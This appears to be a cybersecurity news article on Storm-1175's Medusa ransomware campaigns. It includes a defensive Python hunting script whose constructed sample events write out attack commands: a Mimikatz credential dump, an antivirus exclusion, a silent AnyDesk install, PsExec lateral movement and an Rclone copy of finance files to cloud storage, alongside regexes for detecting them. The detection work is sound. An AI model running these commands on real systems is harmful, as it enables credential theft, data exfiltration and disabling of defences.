👤 TRUSTBREAKER
🗓️ 07 Apr 2026   🗂️ Cyber Warfare     🌍 Asia

Zero-Day Blitz: How Storm-1175’s Medusa Ransomware Raids Are Outpacing Defenders

A China-linked group is exploiting new vulnerabilities at lightning speed, leaving global organizations scrambling to keep up.

In the high-stakes world of cybercrime, a group tracked as Storm-1175 has emerged as one of the fastest and most ruthless ransomware operators on the planet. With a toolkit packed with fresh exploits, several of them zero-days, and a relentless pace, the group holds entire industries hostage - often before the affected organizations have applied a patch, and sometimes before one even exists.

Storm-1175’s modus operandi is as ruthless as it is efficient. The group scours the internet for vulnerable, internet-facing servers - think email gateways, managed file transfer platforms, or remote management tools - and strikes in the critical window after a vulnerability’s public disclosure but before most organizations have patched. Sometimes they are faster still, exploiting zero-days before the vendor has a fix to offer.

Once inside, the attackers don’t waste a second. They immediately plant remote access tools or web shells, giving themselves a backdoor that survives a reboot. New administrator accounts are created on the fly, and with a few commands via trusted, Microsoft-signed utilities like PowerShell or PsExec, Storm-1175 quietly maps the network, searching for valuable data and more systems to compromise - a technique known as “living off the land,” because the tools are ones defenders expect to see.

But what makes Storm-1175 especially dangerous is its abuse of legitimate remote monitoring and management (RMM) software. Tools such as AnyDesk, SimpleHelp, and ConnectWise ScreenConnect - meant for IT support - are installed as the attackers’ own command channel. Because RMM traffic is encrypted, signed, and expected on most networks, the malicious sessions look like everyday IT support and slip under the radar of conventional security tools.

Before unleashing the Medusa ransomware, Storm-1175 disables security defenses, adds antivirus exclusions for its own tooling, and dumps credentials using tools like Impacket and Mimikatz. Sensitive data is siphoned off to attacker-controlled cloud storage using programs like Rclone, setting the stage for the group’s double-extortion strategy: pay up, or your data is leaked to the world.
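The three paragraphs above describe a chain, and that is how a defender should hunt for it: one stage alone (an RMM install, a PowerShell exclusion change) is noise on most networks, but several stages on the same host within a short window is the Storm-1175 playbook. The Python script below is an added example, not code from this article, from Microsoft, or from any Storm-1175 tooling. It runs over a handful of constructed events (field names host, event_id, image, parent, cmdline, member and group are an assumption loosely modelled on Sysmon event 1 and Windows Security events 4720/4732, not any product’s real schema), maps each hit to a stage, and then ranks hosts by how many distinct stages fired. The approved-RMM policy and the RMM binary names are likewise assumptions for the example.

```python
"""Stage-based hunt for the Storm-1175 / Medusa intrusion chain.

Added example for this article; not code from the article, Microsoft, or any
Storm-1175 tooling. SAMPLE_EVENTS is CONSTRUCTED and its field names are an
assumption loosely modelled on Sysmon event 1 / Security events 4720 and 4732.
"""
import ntpath
import re
from collections import defaultdict

# Assumed site policy: ScreenConnect is the sanctioned RMM; any other RMM binary
# on a server is unexpected. Extend RMM_TOOLS from your own software inventory.
APPROVED_RMM = {"screenconnect.clientservice.exe"}
RMM_TOOLS = {"anydesk.exe", "screenconnect.clientservice.exe"}

WEB_SERVER_PARENTS = {"w3wp.exe", "httpd.exe", "java.exe"}  # web shells spawn from these
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe"}
CRED_DUMP = re.compile(r"sekurlsa|lsadump|secretsdump|procdump.*lsass|comsvcs.*MiniDump", re.I)
AV_TAMPER = re.compile(r"Add-MpPreference\s+-Exclusion|Set-MpPreference\s+-Disable", re.I)
RCLONE = re.compile(r"\brclone(\.exe)?\b.*\b(copy|sync|move)\b", re.I)
DISCOVERY = re.compile(r"\b(nltest|net\s+(group|view|user)|quser|nslookup)\b", re.I)

SAMPLE_EVENTS = [  # constructed, in the order the article describes the intrusion
    {"host": "mail01", "event_id": 1, "parent": r"C:\Windows\System32\inetsrv\w3wp.exe",
     "image": r"C:\Windows\System32\cmd.exe", "cmdline": "cmd.exe /c whoami"},
    {"host": "mail01", "event_id": 4720, "member": "svc_backup2"},
    {"host": "mail01", "event_id": 4732, "member": "svc_backup2", "group": "Administrators"},
    {"host": "mail01", "event_id": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\net.exe", "cmdline": 'net group "Domain Admins" /domain'},
    {"host": "mail01", "event_id": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\Public\PsExec64.exe", "cmdline": r"PsExec64.exe \\fs02 -s cmd.exe"},
    {"host": "fs02", "event_id": 1, "parent": r"C:\Windows\PSEXESVC.exe",
     "image": r"C:\ProgramData\AnyDesk\AnyDesk.exe", "cmdline": "AnyDesk.exe --install --silent"},
    {"host": "fs02", "event_id": 1, "parent": r"C:\Windows\PSEXESVC.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": r"powershell.exe Add-MpPreference -ExclusionPath C:\ProgramData"},
    {"host": "fs02", "event_id": 1, "parent": r"C:\Windows\System32\cmd.exe",  # renamed Mimikatz
     "image": r"C:\ProgramData\m.exe", "cmdline": "m.exe privilege::debug sekurlsa::logonpasswords"},
    {"host": "fs02", "event_id": 1, "parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\ProgramData\rclone.exe", "cmdline": r"rclone.exe copy D:\Finance mega:drop -P"},
    # Benign noise: the sanctioned RMM on a helpdesk box must not fire.
    {"host": "hd03", "event_id": 1, "parent": r"C:\Windows\System32\services.exe",
     "image": r"C:\Program Files (x86)\ScreenConnect Client\ScreenConnect.ClientService.exe",
     "cmdline": "ScreenConnect.ClientService.exe"},
]


def _base(path):
    """Lower-cased file name of a Windows path (works on any OS)."""
    return ntpath.basename(path or "").lower()


def detect(events):
    """Return (host, stage, detail) tuples; one stage per event, first rule wins."""
    findings = []
    new_accounts = defaultdict(set)  # host -> local accounts created (4720) in this window
    for e in events:
        host, eid = e["host"], e["event_id"]
        if eid == 4720:
            new_accounts[host].add(e["member"])
        elif eid == 4732 and e.get("group") == "Administrators" and e["member"] in new_accounts[host]:
            findings.append((host, "persistence", f"new account {e['member']} added to Administrators"))
        elif eid == 1:
            img, parent, cmd = _base(e.get("image")), _base(e.get("parent")), e.get("cmdline", "")
            if parent in WEB_SERVER_PARENTS and img in SHELLS:
                findings.append((host, "initial_access", f"{parent} spawned {img}: {cmd}"))
            elif img.startswith("psexec") or img == "psexesvc.exe":
                findings.append((host, "lateral_movement", cmd))
            elif img in RMM_TOOLS - APPROVED_RMM:
                findings.append((host, "c2_rmm", f"unapproved RMM {img}"))
            elif AV_TAMPER.search(cmd):
                findings.append((host, "defense_evasion", cmd))
            elif CRED_DUMP.search(cmd):
                findings.append((host, "credential_access", cmd))
            elif RCLONE.search(cmd):
                findings.append((host, "exfiltration", cmd))
            elif DISCOVERY.search(cmd):
                findings.append((host, "discovery", cmd))
    return findings


def chained_hosts(findings, min_stages=3):
    """Hosts where several distinct stages fired: these match the playbook, not a one-off alert."""
    stages = defaultdict(set)
    for host, stage, _ in findings:
        stages[host].add(stage)
    return {h: sorted(s) for h, s in stages.items() if len(s) >= min_stages}


if __name__ == "__main__":
    hits = detect(SAMPLE_EVENTS)
    for host, stage, detail in hits:
        print(f"{host:7} {stage:18} {detail}")
    print("hosts matching the chain:", chained_hosts(hits))
```

Two design points carry over to real telemetry. First, the credential-dumping rule matches on command-line arguments (sekurlsa, secretsdump, procdump against lsass) rather than on the binary name, so the renamed Mimikatz in the sample is still caught. Second, the persistence rule only fires when a 4732 group addition follows a 4720 account creation on the same host, which is the “new admin account on the fly” pattern the article describes and is far rarer than either event on its own.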

Microsoft has tracked Storm-1175 exploiting more than 16 major vulnerabilities since 2023, including several zero-days such as CVE-2025-10035 and CVE-2026-23760. Recently, the group has also targeted Linux systems, particularly Oracle WebLogic servers, widening its reach and impact.

The group’s “high operational tempo” has left a trail of disruption across continents. For defenders, the lesson is clear: the time between vulnerability disclosure and exploitation is shrinking fast. Isolating internet-facing and critical systems, enforcing strong credential hygiene such as multi-factor authentication and least privilege for administrator accounts, and turning on tamper protection so attackers cannot switch off endpoint security are no longer optional - they’re a race against time.

As Storm-1175 continues to innovate and automate its attacks, organizations worldwide are left with a sobering reality: patching late is now as risky as not patching at all. In a world where cybercriminals weaponize vulnerabilities within hours, vigilance and speed have never been more critical.

WIKICROOK

  • Zero-day: A zero-day vulnerability is a security flaw unknown to the software maker, with no fix available, making it highly valuable and dangerous in the hands of attackers.
  • Double extortion: Double extortion is a cyberattack where criminals both steal and encrypt data, threatening to leak it unless the victim pays a ransom.
  • Living Off the Land: Living Off the Land means attackers use trusted, built-in or signed system tools for malicious purposes, making their activities harder to tell apart from normal administration.
  • Remote Monitoring and Management (RMM): RMM tools let IT professionals remotely control, monitor, and maintain computers - helpful for support, but a ready-made command channel if misused.
  • Credential Dumping: Credential dumping is when attackers extract usernames, passwords, or password hashes from a system’s memory or credential stores to gain unauthorized access to accounts or networks.

TRUSTBREAKER, Zero-Trust Validation Specialist